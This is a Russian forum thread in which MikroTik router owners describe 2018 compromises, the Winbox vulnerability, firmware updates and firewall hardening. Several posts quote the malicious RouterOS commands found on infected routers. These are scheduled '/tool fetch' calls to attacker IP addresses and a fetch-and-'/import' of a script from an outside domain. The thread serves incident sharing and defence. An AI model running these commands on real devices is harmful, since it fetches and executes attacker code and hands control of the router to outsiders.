Перейти к содержимому
Калькуляторы

Проверьте свой микротик на взлом .

 Вчера , проверяя свой домашний тестовый RB750G  обнаружил странные записи в логах и скрипт в system script  /tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no

 который выполнялся через шедуллер через каждые 30 секунд. Прошивка была старая   6.37.5 ....

Гугл не заставил себя долго ждать  - на официальном сайте микротик уже уведомлены об этом.

Обновился до   6.40.8 . сменил пароль....  скрипт  удалил.... Отключил  по совету с форума IP/Socks....

Позвонил знакомый и сообщил что такой же скрипт обнаружил у себя .... с прошивкой 6.41.1....

Не оставили ли они еще какой то заразы в микротике?

 

https://forum.mikrotik.com/viewtopic.php?t=137217&sid=d37ca2abda66df9f536db5c282ad1c85

Кстати первое правило

ip firewall filter
add action=drop chain=input comment="" dst-port=53 in-interface=wan \
    protocol=udp

было не активно....

 

 

 

Изменено пользователем uraso

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Аналогично..

Обнаружил в скриптах

/tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no

 

Воткнут от имени учётки,пароль и юзер не то что бы сложный но не типичный,брутом не прокатит.

 

Чую 53й 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

@Lerych63 

 

Используется дырка в winbox, закрытая обновлением от 24 апреля. Порт 8291, и для обнаружения используется порт 80.

Обновитесь до 6.40.8 или 6.42.6.

И файрвол настройте уже нормально один раз, я ж давал конфиг в соседней теме.

В правильном конфиге должно быть закрыто ВСЕ, кроме того, что НУЖНО. 

 

Изменено пользователем McSea

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Достаточно в IP-Services отключить все не нужное, а у нужного указать диапазоны IP, и никто ничего не сломает даже на старых прошивках.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
В 03.08.2018 в 11:03, uraso сказал:

 Вчера , проверяя свой домашний тестовый RB750G  обнаружил странные записи в логах и скрипт в system script  /tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no

 который выполнялся через шедуллер через каждые 30 секунд. Прошивка была старая   6.37.5 ....

Гугл не заставил себя долго ждать  - на официальном сайте микротик уже уведомлены об этом.

Обновился до   6.40.8 . сменил пароль....  скрипт  удалил.... Отключил  по совету с форума IP/Socks....

Позвонил знакомый и сообщил что такой же скрипт обнаружил у себя .... с прошивкой 6.41.1....

Не оставили ли они еще какой то заразы в микротике?

 

https://forum.mikrotik.com/viewtopic.php?t=137217&sid=d37ca2abda66df9f536db5c282ad1c85

Кстати первое правило

ip firewall filter
add action=drop chain=input comment="" dst-port=53 in-interface=wan \
    protocol=udp

было не активно....

 

 

 

 

Так похоже что новые прошивки дырявые на старых 5.26 и старше не единого взлома, а на новых одни проблемы и ни смена пароля настройки файервола ни закрытие 80 порта не даёт результата недавно пошла ещё одна гадость

/tool fetch url=http://ciskotik.com/3.php mode=http dst-path=mikrotik.php
/import mikrotik.php
 

и новые микротики не всегда удается откатить на версию 5.26

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

@alex8031 6.42.7 проблем нет, пофиксили в версии 6.42.1

5.26 это некрофилия

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
9 часов назад, EShirokiy сказал:

@alex8031 6.42.7 проблем нет, пофиксили в версии 6.42.1

5.26 это некрофилия

ну насчет 6.42.7 если сейчас нет то что будет через месяц два ??? как с предыдущими. 

а 5.26 почти сотня и ни один не взломан!!!

а новые пару десятков и периодически появляется всякая ерунда если вовремя не убереш приходится ехать к клиенту и ресетить потому что закрвается весь доступ к устройству по всем протаколам.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

@alex8031 у меня ломали устройства на старых прошивках, нормально коннектился через мак-телнет. Каждый сам выбирает на каких прошивках сидеть, но на старых ПО и функционал хуже.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
1 час назад, EShirokiy сказал:

@alex8031 у меня ломали устройства на старых прошивках, нормально коннектился через мак-телнет. Каждый сам выбирает на каких прошивках сидеть, но на старых ПО и функционал хуже.

Конечно по мак адресу через телнет можно внутри провайдера и то далеко не всегда а если всё выключено кроме winbox и всё равно ломают видимо разработчик прошивок специально для каких то целей оставляет лазейку, и когда это становится известно посторонним начинаются массовые взломы. Видимо когда создавались старые прошивки не ставилась такая цель!!!

А по функционалу пусть немного беднее зато надёжно...

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
7 hours ago, alex8031 said:

всё равно ломают видимо разработчик прошивок специально для каких то целей оставляет лазейку

Какая лазейка ??   В конце апреля была выявлена конкретная уязвимость, позволяющая получить ВСЕ пароли через винбокс.

В течение двух дней были выпущены фиксы в обеих ветках RouterOS. 

У вас сотня микротиков в управлении, надо же отслеживать регулярно новости по уязвимостям, я лично тут на форуме создавал в день анонса тему, не говоря уже про форум самих микротиков.

 

 

Изменено пользователем McSea

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Если микротик светит в интернет белым IP, то достаточно реализовать управление по VPN, то есть где то в центре стоит микротик, к нему подключаются все другие микротики через интернет, и в службах и у админов устанавливается ограничение доступа с IP = вашей серой подсети. Все, после этого никто взломать уже не сможет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
2 часа назад, Saab95 сказал:

Если микротик светит в интернет белым IP, то достаточно реализовать управление по VPN, то есть где то в центре стоит микротик, к нему подключаются все другие микротики через интернет, и в службах и у админов устанавливается ограничение доступа с IP = вашей серой подсети. Все, после этого никто взломать уже не сможет.

Ну так понятно что микротик стоит на бело адресе но только одного не понятно как после апрельского затыкания дыр на новой прошивке в июле опять ломанули??? И второе ограничивать админку микротика одним адресом не всегда удобно  Вероятно дырявая сама реализация протокола winbox в микротиках.

Или же менять порт 8291 на какой нибудь другой может поможет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
20 минут назад, alex8031 сказал:

Ну так понятно что микротик стоит на бело адресе но только одного не понятно как после апрельского затыкания дыр на новой прошивке в июле опять ломанули???

Как-как... Вы что думаете, когда я с полгода назад сказал, что микротик дырявый как друшлаг - я пошутил? Киевляне, которые нашли там не отдельную дыру, а функционально связанные лазейки, уже довольно давно начали делиться этим на хакерских форумах. Так что веселье ещё предстоит. Сейчас пока кто-то только использует отдельные дыры в своих целях, и не массово. Лично мне больше интересно узнать, это случайные дыры, или специально оставленные, потому что народ говорил, что по коду очень похоже на второе, правда непонятно зачем.
 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
11 часов назад, alex8031 сказал:

И второе ограничивать админку микротика одним адресом не всегда удобно  Вероятно дырявая сама реализация протокола winbox в микротиках.

Или же менять порт 8291 на какой нибудь другой может поможет.

Почему одним? Делаете доступ с серой сети, сами подключаетесь к роутеру по VPN.

По поводу ломанули или нет - если в логах посмотрите, то там полно запросов подключения с ошибками логина и пароля, вот сидят и перебирают все комбинации.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
В 10.09.2018 в 10:32, Saab95 сказал:

Почему одним? Делаете доступ с серой сети, сами подключаетесь к роутеру по VPN.

По поводу ломанули или нет - если в логах посмотрите, то там полно запросов подключения с ошибками логина и пароля, вот сидят и перебирают все комбинации.

Да если бы они просто перебирали им бы лет на 500 точно хватило, столько не только люди но и микротики не живут.

скорее то что написал постом выше straus!!! 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Зачем перебирать пароли, если эксплоиты выложены, просто подключаешься и получаешь их. Было тут и про утилиту RouterScan от Stas'M. Кто влип, ограничивайте доступ к винбокс порту только с локалки, проверьте скрипты ненужные, планировщик, фаервол, сокс и прокси, логгирование. Логи любят ограничивать до одной строчки ))). Можно так же посмотреть из любопытства последние команды в CLI, там  много прикольного  проскакивает. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Ну вот и я наступил на грабли, вернее, их мне подложили.

Прочитал про уязвимости циски и микротика еще в начале лета. Обновил еще тогда свой головной RB3011 до 6.40.9. И вот 2 дня назад получил "wrong username or password". LCD отключён. 

Пришлось делать netinstall, 6.43, полную перенастройку, т.к. бэкапа не было (он работал без всяких проблем уже 3-й год), вроде всё хорошо, заодно обновил знания и кое-что из настроек. Позакрывал все возможные дыры, как из рекомендаций, так и  исходя из своих особенностей.

Все сервисы кроме winbox закрыты, и тот доступен только из моей подсети и рабочего IP.

2 дня как бы всё ок, и тут сегодня опять "wrong username or password". 

No comments, одни мысли и те матом. 

LCD работает, даже конфиг могу reset, но мне здаётся, что дело не в бобине...

По логам на LCD только мои неудачные попытки входа, больше  ничего нет.

Изменено пользователем Parrot

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
1 час назад, Parrot сказал:

до 6.40.9

Так в этой проше вроде заделана дыра?!

1 час назад, Parrot сказал:

Все сервисы кроме winbox закрыты, и тот доступен только из моей подсети и рабочего IP.

 

Тем более...

 

Что-то тут не то. Или нашлась новая дырка(

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Вот и у меня диссонанс на фоне вчерашнего ДР, когда перед ним я провозился почти 6 часов, заново настраивая эту шайтан-машину.

Официальный форум микротик также мне пишет всякую хрень аля "вы учётные данные сменили при перепрошивке"?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Только что, Parrot сказал:

Вот и у меня диссонанс на фоне вчерашнего ДР, когда перед ним я провозился почти 6 часов, заново настраивая эту шайтан-машину.

Официальный форум микротик также мне пишет всякую хрень аля "вы учётные данные сменили при перепрошивке"?

Ну только откатываться на 5,26 или старше у меня на этой ни один не сломали а новые кошмарят по чёрному такое впечатление что производитель этих железок нанял программистов и не заплатил людям за работу а те выложили на суд общественности дыры в прошивках?? Или есть другое мнение???

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
34 минуты назад, alex8031 сказал:

Или есть другое мнение???

Есть. Есть некая дыра, которую зловреды уже опять обнаружили, но официальный производитель признавать не торопится.

Всяческие рекомендации, аля "прописать в firewall 100500 правил для защиты" - не комильфо (прописано 1050).  Оборудование и софт по-умолчанию не должны быть открыты насквозь вдоль и поперёк. Если покупатель, сконфигурировав оборудование под свои нужды, должен еще прописать 100500 правил в фаерволе, то это кусок г-на на лопате, а не софт и hardware. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Лет 5 стоит штук 20 микр на сети, софт 5.25, 6 правил, никто не ломает.

0.thumb.png.4ace7680f248db047044cc2aebdbb2fb.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

вчера вечером опять была волна атак на микроты 

2018-09-15_010117.jpg

2018-09-15_010247.jpg

2018-09-15_010801.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
25 минут назад, Ferdin сказал:

вчера вечером опять была волна атак на микроты 

какая версия?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас